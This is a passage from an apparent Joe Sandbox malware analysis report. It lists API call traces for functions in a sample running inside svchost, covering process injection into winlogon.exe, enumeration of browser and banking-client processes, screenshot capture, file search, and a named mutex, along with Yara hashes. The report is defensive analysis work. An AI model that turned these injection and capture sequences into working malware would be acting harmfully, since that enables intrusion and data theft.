2657d25 1287->1288 1289 2657d19-2657d23 1287->1289 1290 2657d29-2657d3f GetHandleInformation 1288->1290 1289->1290 1290->1286 1291 2657d41-2657d46 1290->1291 1291->1286 1292 2657d48-2657d49 CloseHandle 1291->1292 1292->1286
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 026578A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 026578B4
                                                                                                                                                                                                                • Part of subcall function 026578A0: Process32First.KERNEL32(00000000,?), ref: 026578D9
                                                                                                                                                                                                                • Part of subcall function 026578A0: GetCurrentProcessId.KERNEL32(?,00000000), ref: 026578FD
                                                                                                                                                                                                                • Part of subcall function 026578A0: StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02657917
                                                                                                                                                                                                                • Part of subcall function 026578A0: EnterCriticalSection.KERNEL32(0268FB80,?,00000000), ref: 0265793B
                                                                                                                                                                                                                • Part of subcall function 026578A0: GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02657941
                                                                                                                                                                                                                • Part of subcall function 026578A0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02657948
                                                                                                                                                                                                                • Part of subcall function 026578A0: LeaveCriticalSection.KERNEL32(0268FB80,?,00000000), ref: 02657977
                                                                                                                                                                                                                • Part of subcall function 026578A0: Process32Next.KERNEL32(00000000,00000128), ref: 0265798B
                                                                                                                                                                                                                • Part of subcall function 026578A0: GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 026579A5
                                                                                                                                                                                                                • Part of subcall function 026578A0: CloseHandle.KERNEL32(00000000,?,00000000), ref: 026579B6
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,000002F0), ref: 02657A34
                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02657A58
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02657A82
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02657A94
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0268FB80), ref: 02657A9F
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0268FB80), ref: 02657AC4
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02657B2B
                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02657B4C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02657B70
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02657B82
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0268FB80), ref: 02657B8D
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0268FB80), ref: 02657BB8
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02665460,?,0000001C), ref: 02657C06
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02665460,?,0000001C), ref: 02657C51
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0268FB80,?,?), ref: 02657C90
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000010), ref: 02657C9A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02657CA1
                                                                                                                                                                                                              • Sleep.KERNEL32(00000032), ref: 02657DB5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalProcessSection$Handle$EnterHeap$CloseInformationLeave$OpenProcess32QueryTimesVirtual$AllocAllocateCreateCurrentFirstNextSleepSnapshotToolhelp32
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3323447582-0
                                                                                                                                                                                                              • Opcode ID: d5c16c0e2260ee4f087dd474a1af3fcb73416f0e1f2281571a8c67d3d8cad699
                                                                                                                                                                                                              • Instruction ID: 28ff06edd8f96825c90cb7e34d2dbd3c054e2dd942c01daa720de9d9162f7c4f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5c16c0e2260ee4f087dd474a1af3fcb73416f0e1f2281571a8c67d3d8cad699
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DC12BB0948351AFD321CF65C884A6FFBE9FB88B40F548A1EF98A87240D7709545CF92
                                                                                                                                                                                                              Function 00401670 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 215injectionlibrarymemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00401CF0: memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,76F90F00,00000000,00000000), ref: 00401D27
                                                                                                                                                                                                                • Part of subcall function 00401CF0: GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                                • Part of subcall function 00401CF0: SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                                • Part of subcall function 00401CF0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,00000000,?,76A8DB30,00402F58,winlogon.exe), ref: 0040169D
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,76A8DB30,00402F58,winlogon.exe), ref: 004016BC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004016DB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004016F1
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 004016FD
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401718
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401728
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040176F
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401791
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004017BD
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?), ref: 004017D8
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 004017F3
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00401801
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,?,00406400,00053200,?), ref: 00401834
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401844
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401856
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000), ref: 0040186E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040187F
                                                                                                                                                                                                              • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004018A0
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000), ref: 004018BC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                              • API String ID: 3542510048-3024904723
                                                                                                                                                                                                              • Opcode ID: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                              • Instruction ID: aea8cd550169bae8ca71061e7f9b66115ece3b9acf575b2a14c75ec5d6601f55
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1071A4B1A00315ABE7109F94DD89FAF77B8EF88701F158039FA01B72D1D7789A458768
                                                                                                                                                                                                              Function 02647680 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 215memoryfilestringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,026645D3,?,0269D2A0,76F8F380), ref: 026476BB
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026476C2
                                                                                                                                                                                                              • memset.MSVCRT ref: 026476DA
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,026645C4,00000104), ref: 026476E9
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?), ref: 02647711
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocFileFindFirstProcesslstrcpynmemset
                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                              • API String ID: 2617121151-1173974218
                                                                                                                                                                                                              • Opcode ID: f8902099ab7a0f651fb1668500ce86a38b23c4eff8b4810fd8f05bbc2d7755ca
                                                                                                                                                                                                              • Instruction ID: 06d8acf2fad80ae08dbbc1e974057518dd59342f678c79d1bb3dee25fdc23ccb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8902099ab7a0f651fb1668500ce86a38b23c4eff8b4810fd8f05bbc2d7755ca
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E610371904346ABC7229F349C98FBBBFADAF46354F494A54F9C287281EF21D409C7A1
                                                                                                                                                                                                              Function 02664CC0 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 211injectionlibrarymemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02665680: memset.MSVCRT ref: 026656A6
                                                                                                                                                                                                                • Part of subcall function 02665680: CreateToolhelp32Snapshot.KERNEL32(00000008,?,?,00000000,76F90F00), ref: 026656B7
                                                                                                                                                                                                                • Part of subcall function 02665680: GetLastError.KERNEL32 ref: 026656C0
                                                                                                                                                                                                                • Part of subcall function 02665680: SwitchToThread.KERNEL32 ref: 026656CF
                                                                                                                                                                                                                • Part of subcall function 02665680: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 026656D8
                                                                                                                                                                                                                • Part of subcall function 02665680: GetHandleInformation.KERNEL32(00000000,00000000), ref: 026656F8
                                                                                                                                                                                                                • Part of subcall function 02665680: CloseHandle.KERNEL32(00000000), ref: 02665709
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,00000000,00000000,?,?), ref: 02664CFF
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,?,?), ref: 02664D1E
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02664D3D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02664D53
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 02664D5F
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02664D7A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02664D8A
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 02664DC4
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,?), ref: 02664DE5
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02664E11
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,?,00003000,00000004), ref: 02664E29
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,00000004,?,?,00003000,00000004), ref: 02664E44
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00003000,00000004), ref: 02664E52
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 02664E7A
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02664E8C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02664EA4
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02664EB5
                                                                                                                                                                                                              • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02664ED6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02664EF2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02664F03
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CreateProcess$CloseInformationThreadVirtual$AddressAllocMemoryModuleProcSnapshotToolhelp32Write$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                              • API String ID: 2650560580-3024904723
                                                                                                                                                                                                              • Opcode ID: c68d30ec91e91e0437cd394d3ef3517e5bed111e1902a11214b5deb50fb8eaa6
                                                                                                                                                                                                              • Instruction ID: 8ee3a30c152aad43281f93f1a677c8f0865187a6423df7711ad2400a957ee5d7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c68d30ec91e91e0437cd394d3ef3517e5bed111e1902a11214b5deb50fb8eaa6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F618075A40305BFE720DF64CC88FBE77A8AF84B04F558519F9469B280DBB4D941CBA4
                                                                                                                                                                                                              Function 026654A0 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 164memorywindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 026654B0
                                                                                                                                                                                                              • GetWindowDC.USER32(00000000), ref: 026654B7
                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 026654C8
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 026654E1
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 026654E9
                                                                                                                                                                                                              • CreateDIBSection.GDI32(00000000,?,00000001,?,00000000,00000000), ref: 02665522
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0266552C
                                                                                                                                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 02665549
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0266554F
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 02665559
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00001020), ref: 0266556F
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02665576
                                                                                                                                                                                                              • memset.MSVCRT ref: 0266558A
                                                                                                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 026655A5
                                                                                                                                                                                                                • Part of subcall function 02654170: GetProcessHeap.KERNEL32(00000008,02650BF7,02650BE3,?,02658A25,?,?,?), ref: 02654181
                                                                                                                                                                                                                • Part of subcall function 02654170: RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 02654188
                                                                                                                                                                                                                • Part of subcall function 02654170: memset.MSVCRT ref: 02654198
                                                                                                                                                                                                                • Part of subcall function 026541B0: GetProcessHeap.KERNEL32(00000000,00000000,6F9690B0,02650C69), ref: 026541BE
                                                                                                                                                                                                                • Part of subcall function 026541B0: HeapValidate.KERNEL32(00000000), ref: 026541C1
                                                                                                                                                                                                                • Part of subcall function 026541B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 026541CE
                                                                                                                                                                                                                • Part of subcall function 026541B0: RtlFreeHeap.NTDLL(00000000), ref: 026541D1
                                                                                                                                                                                                              • GetDIBits.GDI32(0265EEFB,00000000,00000000,?,00000000,00000000,00000000), ref: 026655F4
                                                                                                                                                                                                              • ReleaseDC.USER32(?,0265EEFB), ref: 0266566C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Window$BitsCapsCreateDesktopDevicememset$AllocAllocateCompatibleFreeObjectReleaseSectionSelectValidate
                                                                                                                                                                                                              • String ID: ($BM
                                                                                                                                                                                                              • API String ID: 3203594236-2980357723
                                                                                                                                                                                                              • Opcode ID: 2b15f7ecbc9e417ff685e568cecafa5fff2a8dddec76e246cf2732c754d5b513
                                                                                                                                                                                                              • Instruction ID: b5c28314d8fe6ba5179498d70efe290205f58dbee280d2669e71de3c577635b6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b15f7ecbc9e417ff685e568cecafa5fff2a8dddec76e246cf2732c754d5b513
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 245171B1D40214BBDB109FA4DC49BAFBBB9EF48710F514619F906FB380DB7499408BA4
                                                                                                                                                                                                              Function 02669910 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 178filememoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,76F92F00), ref: 02669991
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 026699AD
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?), ref: 026699BC
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 026699C9
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02669A08
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02669A16
                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(00000000,?), ref: 02669B0D
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 02669B1C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$FileLocalwsprintf$AllocCloseFirstFreeNext_snprintf
                                                                                                                                                                                                              • String ID: %s%s$%s\%s$%s\*$.
                                                                                                                                                                                                              • API String ID: 2477558990-1591360731
                                                                                                                                                                                                              • Opcode ID: b8bdc2b61af2c91ff99b0ae50edc3623b9b5afdb690e717b81f71d93f3ad51e2
                                                                                                                                                                                                              • Instruction ID: fd01d0979ad050656c2bd6adfdcae7eac818b181a2d842fb72d57b571b5b33fc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8bdc2b61af2c91ff99b0ae50edc3623b9b5afdb690e717b81f71d93f3ad51e2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 405190B1509381ABD320DF54CC88BBBB7E9FB89704F084A0DFD8587240DB759948CBA2
                                                                                                                                                                                                              Function 02654F80 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 87networkstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsNetworkAlive.SENSAPI(02646E0D,00000000), ref: 02654F93
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02654FA1
                                                                                                                                                                                                              • DnsFlushResolverCache.DNSAPI ref: 02654FAB
                                                                                                                                                                                                              • memset.MSVCRT ref: 02654FC8
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,76F90F10), ref: 02654FE7
                                                                                                                                                                                                              • StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02655000
                                                                                                                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02655013
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265502C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,76F90F10), ref: 02655045
                                                                                                                                                                                                              • StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02655058
                                                                                                                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02655065
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CheckConnectionInternetlstrcpynmemset$AdminAliveCacheFlushNetworkResolverUser
                                                                                                                                                                                                              • String ID: http://$www.bing.com$www.microsoft.com
                                                                                                                                                                                                              • API String ID: 1656757314-3977723178
                                                                                                                                                                                                              • Opcode ID: 739984732d8b0e9b8128f5f1502469013984f4fbd0b3be1678b7177489b16270
                                                                                                                                                                                                              • Instruction ID: 24316b2ca5839180325d01fdbf0a218821b04b25f49371a25e4e74a9e099c9f7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 739984732d8b0e9b8128f5f1502469013984f4fbd0b3be1678b7177489b16270
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA21D872A8431877EB20E6A4AC41FDEB76C9B54710F400695F689E61C0EAF1A6D48BD1
                                                                                                                                                                                                              Function 02647FD0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 76sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02647FF1
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02648002
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02648010
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02648019
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0264802F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02648041
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02648069
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02648082
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0264808D
                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000), ref: 02648099
                                                                                                                                                                                                              • Sleep.KERNEL32(000007D0), ref: 026480A4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Mutex$HandleOpenSleep$CloseEventExitFileInformationModuleNameProcessRelease
                                                                                                                                                                                                              • String ID: Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}$\explorer.exe
                                                                                                                                                                                                              • API String ID: 2248524772-792691438
                                                                                                                                                                                                              • Opcode ID: ff23d171ca73ef9f39de98b8ea5d388514593d3ea77bd7265a7d1d9d2e451702
                                                                                                                                                                                                              • Instruction ID: 94c004ae585fcb1a7fccdd16f8d46a39f1c78c638fff62b601ba2dacd7c8c815
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff23d171ca73ef9f39de98b8ea5d388514593d3ea77bd7265a7d1d9d2e451702
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3321D8319C13047BD321AB75DC45B2EB79CAF80F15F411B19F985A7280DFB4E8508AA7
                                                                                                                                                                                                              Function 026578A0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 89memoryprocessCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 026578B4
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 026578D9
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000), ref: 026578FD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02657917
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0268FB80,?,00000000), ref: 0265793B
